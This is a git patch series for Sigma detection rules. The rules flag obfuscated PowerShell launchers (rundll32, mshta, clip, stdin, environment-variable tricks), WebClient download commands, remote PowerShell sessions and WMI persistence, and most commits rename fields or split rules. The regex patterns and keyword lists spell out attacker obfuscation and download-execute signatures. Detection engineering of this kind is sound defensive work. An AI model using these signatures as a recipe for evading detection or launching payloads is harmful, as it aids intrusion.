a/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services_security.yml new file mode 100644 index 00000000..a180e633 --- /dev/null +++ b/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services_security.yml @@ -0,0 +1,29 @@ +title: Invoke-Obfuscation RUNDLL LAUNCHER +id: f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca +related: + - id: 11b52f18-aaec-4d60-9143-5dd8cc4706b9 + type: derived +description: Detects Obfuscated Powershell via RUNDLL LAUNCHER +status: experimental +author: Timur Zinniatullin, oscd.community +date: 2020/10/18 +modified: 2021/09/18 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task 23) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + service: security +detection: + selection_eventid: + EventID: 4697 + selection: + ImagePath|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' + condition: selection and selection_eventid +falsepositives: + - Unknown +level: medium diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services_security.yml new file mode 100644 index 00000000..47e0c6e9 --- /dev/null +++ b/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services_security.yml @@ -0,0 +1,29 @@ +title: Invoke-Obfuscation Via Stdin +id: 80b708f3-d034-40e4-a6c8-d23b7a7db3d1 +related: + - id: 487c7524-f892-4054-b263-8a0ace63fc25 + type: derived +description: Detects Obfuscated Powershell via Stdin in Scripts +status: experimental +author: Nikita Nazarov, oscd.community +date: 2020/10/12 +modified: 2021/09/18 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task28) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + service: security +detection: + selection_eventid: + EventID: 4697 + selection: + ImagePath|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"' + condition: selection and selection_eventid +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services_security.yml new file mode 100644 index 00000000..6fa79061 --- /dev/null +++ b/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services_security.yml @@ -0,0 +1,31 @@ +title: Invoke-Obfuscation Via Use Clip +id: 1a0a2ff1-611b-4dac-8216-8a7b47c618a6 +related: + - id: 63e3365d-4824-42d8-8b82-e56810fefa0c + type: derived +description: Detects Obfuscated Powershell via use Clip.exe in Scripts +status: experimental +author: Nikita Nazarov, oscd.community +date: 2020/10/09 +modified: 2021/09/18 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task29) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + service: security +detection: + selection_eventid: + EventID: 4697 + selection: + ImagePath|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*' + condition: selection and selection_eventid +falsepositives: + - Unknown +level: high + + diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services_security.yml new file mode 100644 index 00000000..6f66d4fd --- /dev/null +++ b/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services_security.yml @@ -0,0 +1,29 @@ +title: Invoke-Obfuscation Via Use MSHTA +id: 9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a +related: + - id: 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4 + type: derived +description: Detects Obfuscated Powershell via use MSHTA in Scripts +status: experimental +author: Nikita Nazarov, oscd.community +date: 2020/10/09 +modified: 2021/09/18 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task31) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + service: security +detection: + selection_eventid: + EventID: 4697 + selection: + ImagePath|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' + condition: selection and selection_eventid +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services_security.yml new file mode 100644 index 00000000..18e9fb4e --- /dev/null +++ b/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services_security.yml @@ -0,0 +1,29 @@ +title: Invoke-Obfuscation Via Use Rundll32 +id: cd0f7229-d16f-42de-8fe3-fba365fbcb3a +related: + - id: 641a4bfb-c017-44f7-800c-2aee0184ce9b + type: derived +description: Detects Obfuscated Powershell via use Rundll32 in Scripts +status: experimental +author: Nikita Nazarov, oscd.community +date: 2020/10/09 +modified: 2021/09/18 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task30) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + service: security +detection: + selection_eventid: + EventID: 4697 + selection: + ImagePath|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"' + condition: selection and selection_eventid +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_var++_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_via_var++_services_security.yml new file mode 100644 index 00000000..51bbebc9 --- /dev/null +++ b/rules/windows/builtin/win_invoke_obfuscation_via_var++_services_security.yml @@ -0,0 +1,29 @@ +title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION +id: 4c54ba8f-73d2-4d40-8890-d9cf1dca3d30 +related: + - id: 14bcba49-a428-42d9-b943-e2ce0f0f7ae6 + type: derived +description: Detects Obfuscated Powershell via VAR++ LAUNCHER +status: experimental +author: Timur Zinniatullin, oscd.community +date: 2020/10/13 +modified: 2021/09/18 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task27) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + service: security +detection: + selection_eventid: + EventID: 4697 + selection: + ImagePath|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r + condition: selection and selection_eventid +falsepositives: + - Unknown +level: high \ No newline at end of file From 10d11b7890d3b834f6fb3e93421d494d5e6bc1b5 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 20 Sep 2021 22:53:59 +0200 Subject: [PATCH 0998/1367] fix 4697 fieldname --- ..._invoke_obfuscation_clip+_services_security.yml | 2 +- ...bfuscation_obfuscated_iex_services_security.yml | 14 +++++++------- ...invoke_obfuscation_stdin+_services_security.yml | 2 +- ...n_invoke_obfuscation_var+_services_security.yml | 2 +- ..._obfuscation_via_compress_services_security.yml | 2 +- ...ke_obfuscation_via_rundll_services_security.yml | 2 +- ...oke_obfuscation_via_stdin_services_security.yml | 2 +- ..._obfuscation_via_use_clip_services_security.yml | 2 +- ...obfuscation_via_use_mshta_services_security.yml | 2 +- ...uscation_via_use_rundll32_services_security.yml | 2 +- ...oke_obfuscation_via_var++_services_security.yml | 2 +- 11 files changed, 17 insertions(+), 17 deletions(-) diff --git a/rules/windows/builtin/win_invoke_obfuscation_clip+_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_clip+_services_security.yml index 3437be16..78e39d46 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_clip+_services_security.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_clip+_services_security.yml @@ -23,7 +23,7 @@ detection: selection_eventid: EventID: 4697 selection: - ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"' + ServiceFileName|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"' condition: selection and selection_eventid falsepositives: - Unknown diff --git a/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services_security.yml index 8f59c788..043bcf55 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services_security.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_obfuscated_iex_services_security.yml @@ -18,13 +18,13 @@ detection: selection: EventID: 4697 selection_1: - - ImagePath|re: '\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[' - - ImagePath|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[' - - ImagePath|re: '\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[' - - ImagePath|re: '\$env:ComSpec\[(\s*\d{1,3}\s*,){2}' - - ImagePath|re: '\\*mdr\*\W\s*\)\.Name' - - ImagePath|re: '\$VerbosePreference\.ToString\(' - - ImagePath|re: '\String\]\s*\$VerbosePreference' + - ServiceFileName|re: '\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[' + - ServiceFileName|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[' + - ServiceFileName|re: '\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[' + - ServiceFileName|re: '\$env:ComSpec\[(\s*\d{1,3}\s*,){2}' + - ServiceFileName|re: '\\*mdr\*\W\s*\)\.Name' + - ServiceFileName|re: '\$VerbosePreference\.ToString\(' + - ServiceFileName|re: '\String\]\s*\$VerbosePreference' condition: selection and selection_1 falsepositives: - Unknown diff --git a/rules/windows/builtin/win_invoke_obfuscation_stdin+_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_stdin+_services_security.yml index 92e539b6..4e7bc9f1 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_stdin+_services_security.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_stdin+_services_security.yml @@ -22,7 +22,7 @@ detection: selection_eventid: EventID: 4697 selection: - ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"' + ServiceFileName|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"' condition: selection and selection_eventid falsepositives: - Unknown diff --git a/rules/windows/builtin/win_invoke_obfuscation_var+_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_var+_services_security.yml index de9ff35a..8b6aec83 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_var+_services_security.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_var+_services_security.yml @@ -22,7 +22,7 @@ detection: selection_eventid: EventID: 4697 selection: - ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' + ServiceFileName|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' condition: all of them falsepositives: - Unknown diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_compress_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_via_compress_services_security.yml index fef655aa..e8e46fbc 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_compress_services_security.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_compress_services_security.yml @@ -22,7 +22,7 @@ detection: selection_eventid: EventID: 4697 selection: - ImagePath|re: '(?i).*new-object.*(?:system\.io\.compression\.deflatestream|system\.io\.streamreader).*text\.encoding\]::ascii.*readtoend' + ServiceFileName|re: '(?i).*new-object.*(?:system\.io\.compression\.deflatestream|system\.io\.streamreader).*text\.encoding\]::ascii.*readtoend' condition: selection and selection_eventid falsepositives: - unknown diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services_security.yml index a180e633..ac9023d7 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services_security.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_rundll_services_security.yml @@ -22,7 +22,7 @@ detection: selection_eventid: EventID: 4697 selection: - ImagePath|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' + ServiceFileName|re: '(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"' condition: selection and selection_eventid falsepositives: - Unknown diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services_security.yml index 47e0c6e9..002cd3f5 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services_security.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_stdin_services_security.yml @@ -22,7 +22,7 @@ detection: selection_eventid: EventID: 4697 selection: - ImagePath|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"' + ServiceFileName|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"' condition: selection and selection_eventid falsepositives: - Unknown diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services_security.yml index 6fa79061..5ee720c6 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services_security.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_use_clip_services_security.yml @@ -22,7 +22,7 @@ detection: selection_eventid: EventID: 4697 selection: - ImagePath|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*' + ServiceFileName|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*' condition: selection and selection_eventid falsepositives: - Unknown diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services_security.yml index 6f66d4fd..ddbafaf9 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services_security.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services_security.yml @@ -22,7 +22,7 @@ detection: selection_eventid: EventID: 4697 selection: - ImagePath|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' + ServiceFileName|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' condition: selection and selection_eventid falsepositives: - Unknown diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services_security.yml index 18e9fb4e..7eb17b8b 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services_security.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services_security.yml @@ -22,7 +22,7 @@ detection: selection_eventid: EventID: 4697 selection: - ImagePath|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"' + ServiceFileName|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"' condition: selection and selection_eventid falsepositives: - Unknown diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_var++_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_via_var++_services_security.yml index 51bbebc9..e2650e7d 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_var++_services_security.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_var++_services_security.yml @@ -22,7 +22,7 @@ detection: selection_eventid: EventID: 4697 selection: - ImagePath|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r + ServiceFileName|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r condition: selection and selection_eventid falsepositives: - Unknown From 79d22dde5879c2e25ef6bc4979a5a0705aad95df Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 20 Sep 2021 22:56:13 +0200 Subject: [PATCH 0999/1367] split global win_invoke_obfuscation_* --- ..._load_invoke_obfuscation_var+_services.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 rules-unsupported/driver_load_invoke_obfuscation_var+_services.yml diff --git a/rules-unsupported/driver_load_invoke_obfuscation_var+_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_var+_services.yml new file mode 100644 index 00000000..2619bc83 --- /dev/null +++ b/rules-unsupported/driver_load_invoke_obfuscation_var+_services.yml @@ -0,0 +1,28 @@ +title: Invoke-Obfuscation VAR+ Launcher +id: 3e27b010-2cf2-4577-8ef0-3ea44aaea0dc +related: + - id: 8ca7004b-e620-4ecb-870e-86129b5b8e75 + type: derived +description: Detects Obfuscated use of Environment Variables to execute PowerShell +status: experimental +author: Jonathan Cheong, oscd.community +date: 2020/10/15 +modified: 2021/09/17 +references: + - https://github.com/Neo23x0/sigma/issues/1009 #(Task 24) +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + product: windows + category: driver_load +detection: + selection: + ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' + condition: selection +falsepositives: + - Unknown +level: high + From 95af26f9635a6f2edae40fceb1582a4c3e7421c6 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 09:46:02 +0200 Subject: [PATCH 1000/1367] split powershell_suspicious_download.yml --- ...powershell_classic_suspicious_download.yml | 33 +++++++++++++++++++ .../powershell_suspicious_download.yml | 30 +++-------------- 2 files changed, 38 insertions(+), 25 deletions(-) create mode 100644 rules/windows/powershell/powershell_classic_suspicious_download.yml diff --git a/rules/windows/powershell/powershell_classic_suspicious_download.yml b/rules/windows/powershell/powershell_classic_suspicious_download.yml new file mode 100644 index 00000000..5560edef --- /dev/null +++ b/rules/windows/powershell/powershell_classic_suspicious_download.yml @@ -0,0 +1,33 @@ +title: Suspicious PowerShell Download +id: 3236fcd0-b7e3-4433-b4f8-86ad61a9af2d +related: + - id: 65531a81-a694-4e31-ae04-f8ba5bc33759 + type: derived +status: experimental +description: Detects suspicious PowerShell download command +tags: + - attack.execution + - attack.t1059.001 + - attack.t1086 #an old one +author: Florian Roth +date: 2017/03/05 +modified: 2021/09/21 +logsource: + product: windows + service: powershell-classic + definition: fields have to be extract from event +detection: + downloadfile: + EventID: 400 # get 400 ,403 and 600 for 1 execution + HostApplication|contains|all: + - 'System.Net.WebClient' + - '.DownloadFile(' + downloadstring: + EventID: 400 + HostApplication|contains|all: + - 'System.Net.WebClient' + - '.DownloadString(' + condition: downloadfile or downloadstring +falsepositives: + - PowerShell scripts that download content from the Internet +level: medium \ No newline at end of file diff --git a/rules/windows/powershell/powershell_suspicious_download.yml b/rules/windows/powershell/powershell_suspicious_download.yml index 4870c05b..703141c7 100644 --- a/rules/windows/powershell/powershell_suspicious_download.yml +++ b/rules/windows/powershell/powershell_suspicious_download.yml @@ -1,5 +1,5 @@ -action: global title: Suspicious PowerShell Download +id: 65531a81-a694-4e31-ae04-f8ba5bc33759 status: experimental description: Detects suspicious PowerShell download command tags: @@ -8,12 +8,7 @@ tags: - attack.t1086 #an old one author: Florian Roth date: 2017/03/05 -modified: 2021/07/20 -falsepositives: - - PowerShell scripts that download content from the Internet -level: medium ---- -id: 65531a81-a694-4e31-ae04-f8ba5bc33759 +modified: 2021/09/21 logsource: product: windows service: powershell @@ -24,21 +19,6 @@ detection: - '.DownloadFile(' - '.DownloadString(' condition: webclient and download ---- -id: 3236fcd0-b7e3-4433-b4f8-86ad61a9af2d -logsource: - product: windows - service: powershell-classic - definition: fields have to be extract from event -detection: - downloadfile: - EventID: 400 # get 400 ,403 and 600 for 1 execution - HostApplication|contains|all: - - 'System.Net.WebClient' - - '.DownloadFile(' - downloadstring: - EventID: 400 - HostApplication|contains|all: - - 'System.Net.WebClient' - - '.DownloadString(' - condition: downloadfile or downloadstring \ No newline at end of file +falsepositives: + - PowerShell scripts that download content from the Internet +level: medium \ No newline at end of file From f5d58a0cb15726ef95a7173fe1257ae9b655290f Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 09:48:50 +0200 Subject: [PATCH 1001/1367] split powershell_remote_powershell_session.yml --- ...hell_classic_remote_powershell_session.yml | 32 +++++++++++++++++++ .../powershell_remote_powershell_session.yml | 24 +++----------- 2 files changed, 37 insertions(+), 19 deletions(-) create mode 100644 rules/windows/powershell/powershell_classic_remote_powershell_session.yml diff --git a/rules/windows/powershell/powershell_classic_remote_powershell_session.yml b/rules/windows/powershell/powershell_classic_remote_powershell_session.yml new file mode 100644 index 00000000..d720d95d --- /dev/null +++ b/rules/windows/powershell/powershell_classic_remote_powershell_session.yml @@ -0,0 +1,32 @@ +title: Remote PowerShell Session +id: 60167e5c-84b2-4c95-a7ac-86281f27c445 +related: + - id: 96b9f619-aa91-478f-bacb-c3e50f8df575 + type: derived +description: Detects remote PowerShell sessions +status: test +date: 2019/08/10 +modified: 2021/09/21 +author: Roberto Rodriguez @Cyb3rWard0g +references: + - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html +tags: + - attack.execution + - attack.t1059.001 + - attack.t1086 # an old one + - attack.lateral_movement + - attack.t1021.006 + - attack.t1028 # an old one +logsource: + product: windows + service: powershell-classic + definition: fields have to be extract from event +detection: + selection: + EventID: 400 + HostName: 'ServerRemoteHost' + HostApplication|contains: 'wsmprovhost.exe' + condition: selection +falsepositives: + - Legitimate use remote PowerShell sessions +level: high \ No newline at end of file diff --git a/rules/windows/powershell/powershell_remote_powershell_session.yml b/rules/windows/powershell/powershell_remote_powershell_session.yml index 429a623b..146af6e5 100644 --- a/rules/windows/powershell/powershell_remote_powershell_session.yml +++ b/rules/windows/powershell/powershell_remote_powershell_session.yml @@ -1,9 +1,9 @@ -action: global title: Remote PowerShell Session +id: 96b9f619-aa91-478f-bacb-c3e50f8df575 description: Detects remote PowerShell sessions status: test date: 2019/08/10 -modified: 2020/08/24 +modified: 2021/09/21 author: Roberto Rodriguez @Cyb3rWard0g references: - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html @@ -14,11 +14,6 @@ tags: - attack.lateral_movement - attack.t1021.006 - attack.t1028 # an old one -falsepositives: - - Legitimate use remote PowerShell sessions -level: high ---- -id: 96b9f619-aa91-478f-bacb-c3e50f8df575 logsource: product: windows service: powershell @@ -30,15 +25,6 @@ detection: - ' = ServerRemoteHost ' # HostName: 'ServerRemoteHost' french : Nom d’hôte = - 'wsmprovhost.exe' # HostApplication|contains: 'wsmprovhost.exe' french Application hôte = condition: selection ---- -id: 60167e5c-84b2-4c95-a7ac-86281f27c445 -logsource: - product: windows - service: powershell-classic - definition: fields have to be extract from event -detection: - selection: - EventID: 400 - HostName: 'ServerRemoteHost' - HostApplication|contains: 'wsmprovhost.exe' - condition: selection +falsepositives: + - Legitimate use remote PowerShell sessions +level: high \ No newline at end of file From 0a6ac0b171f355f4b93e9e84d2525ec49e1c8d80 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 09:52:35 +0200 Subject: [PATCH 1002/1367] split global powershell_alternate_powershell_hosts.yml --- .../powershell_alternate_powershell_hosts.yml | 29 ++++------------- ...ell_classic_alternate_powershell_hosts.yml | 32 +++++++++++++++++++ 2 files changed, 39 insertions(+), 22 deletions(-) create mode 100644 rules/windows/powershell/powershell_classic_alternate_powershell_hosts.yml diff --git a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml index 58cad683..d3ce9723 100644 --- a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml @@ -1,9 +1,9 @@ -action: global title: Alternate PowerShell Hosts +id: 64e8e417-c19a-475a-8d19-98ea705394cc description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe status: test date: 2019/08/11 -modified: 2021/08/28 +modified: 2021/09/21 author: Roberto Rodriguez @Cyb3rWard0g references: - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html @@ -11,13 +11,6 @@ tags: - attack.execution - attack.t1059.001 - attack.t1086 # an old one -falsepositives: - - Programs using PowerShell directly without invocation of a dedicated interpreter - - MSP Detection Searcher - - Citrix ConfigSync.ps1 -level: medium ---- -id: 64e8e417-c19a-475a-8d19-98ea705394cc logsource: product: windows service: powershell @@ -29,16 +22,8 @@ detection: filter: ContextInfo|contains: 'powershell.exe' # Host Application=...powershell.exe or Application hote=...powershell.exe in French Win10 event condition: selection and not filter ---- -id: d7326048-328b-4d5e-98af-86e84b17c765 -logsource: - product: windows - service: powershell-classic - definition: fields have to be extract from event -detection: - selection: - EventID: 400 - HostApplication: '*' - filter: - HostApplication|startswith: 'C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe' - condition: selection and not filter \ No newline at end of file +falsepositives: + - Programs using PowerShell directly without invocation of a dedicated interpreter + - MSP Detection Searcher + - Citrix ConfigSync.ps1 +level: medium \ No newline at end of file diff --git a/rules/windows/powershell/powershell_classic_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_classic_alternate_powershell_hosts.yml new file mode 100644 index 00000000..154ddfde --- /dev/null +++ b/rules/windows/powershell/powershell_classic_alternate_powershell_hosts.yml @@ -0,0 +1,32 @@ +title: Alternate PowerShell Hosts +id: d7326048-328b-4d5e-98af-86e84b17c765 +related: + - id: 64e8e417-c19a-475a-8d19-98ea705394cc + type: derived +description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe +status: test +date: 2019/08/11 +modified: 2021/09/21 +author: Roberto Rodriguez @Cyb3rWard0g +references: + - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html +tags: + - attack.execution + - attack.t1059.001 + - attack.t1086 # an old one +logsource: + product: windows + service: powershell-classic + definition: fields have to be extract from event +detection: + selection: + EventID: 400 + HostApplication: '*' + filter: + HostApplication|startswith: 'C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe' + condition: selection and not filter +falsepositives: + - Programs using PowerShell directly without invocation of a dedicated interpreter + - MSP Detection Searcher + - Citrix ConfigSync.ps1 +level: medium \ No newline at end of file From a96dd66b46cdcc4f3be84b207c1e3ad9f11211e7 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 09:56:03 +0200 Subject: [PATCH 1003/1367] split global win_wmi_persistence.yml --- .../other/win_security_wmi_persistence.yml | 30 +++++++++++++++++++ rules/windows/other/win_wmi_persistence.yml | 23 ++++---------- 2 files changed, 35 insertions(+), 18 deletions(-) create mode 100644 rules/windows/other/win_security_wmi_persistence.yml diff --git a/rules/windows/other/win_security_wmi_persistence.yml b/rules/windows/other/win_security_wmi_persistence.yml new file mode 100644 index 00000000..514a0ca9 --- /dev/null +++ b/rules/windows/other/win_security_wmi_persistence.yml @@ -0,0 +1,30 @@ +title: WMI Persistence +id: f033f3f3-fd24-4995-97d8-a3bb17550a88 +related: + - id: 0b7889b4-5577-4521-a60a-3376ee7f9f7b + type: derived +status: experimental +description: Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs. +author: Florian Roth, Gleb Sukhodolskiy, Timur Zinniatullin oscd.community +date: 2017/08/22 +modified: 2021/09/21 +references: + - https://twitter.com/mattifestation/status/899646620148539397 + - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/ +tags: + - attack.persistence + - attack.privilege_escalation + - attack.t1084 # an old one + - attack.t1546.003 +logsource: + product: windows + service: security +detection: + wmi_subscription: + EventID: 4662 + ObjectType: 'WMI Namespace' + ObjectName|contains: 'subscription' + condition: wmi_subscription +falsepositives: + - Unknown (data set is too small; further testing needed) +level: medium \ No newline at end of file diff --git a/rules/windows/other/win_wmi_persistence.yml b/rules/windows/other/win_wmi_persistence.yml index 38819f13..dcb47cae 100644 --- a/rules/windows/other/win_wmi_persistence.yml +++ b/rules/windows/other/win_wmi_persistence.yml @@ -1,10 +1,10 @@ -action: global title: WMI Persistence +id: 0b7889b4-5577-4521-a60a-3376ee7f9f7b status: experimental description: Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs. author: Florian Roth, Gleb Sukhodolskiy, Timur Zinniatullin oscd.community date: 2017/08/22 -modified: 2020/10/13 +modified: 2021/09/21 references: - https://twitter.com/mattifestation/status/899646620148539397 - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/ @@ -13,11 +13,6 @@ tags: - attack.privilege_escalation - attack.t1084 # an old one - attack.t1546.003 -falsepositives: - - Unknown (data set is too small; further testing needed) -level: medium ---- -id: 0b7889b4-5577-4521-a60a-3376ee7f9f7b logsource: product: windows service: wmi #native windows detection @@ -33,14 +28,6 @@ detection: wmi_filter_registration: EventID: 5859 condition: (wmi_filter_to_consumer_binding and consumer_keywords) or (wmi_filter_registration) ---- -id: f033f3f3-fd24-4995-97d8-a3bb17550a88 -logsource: - product: windows - service: security -detection: - wmi_subscription: - EventID: 4662 - ObjectType: 'WMI Namespace' - ObjectName|contains: 'subscription' - condition: wmi_subscription \ No newline at end of file +falsepositives: + - Unknown (data set is too small; further testing needed) +level: medium \ No newline at end of file From 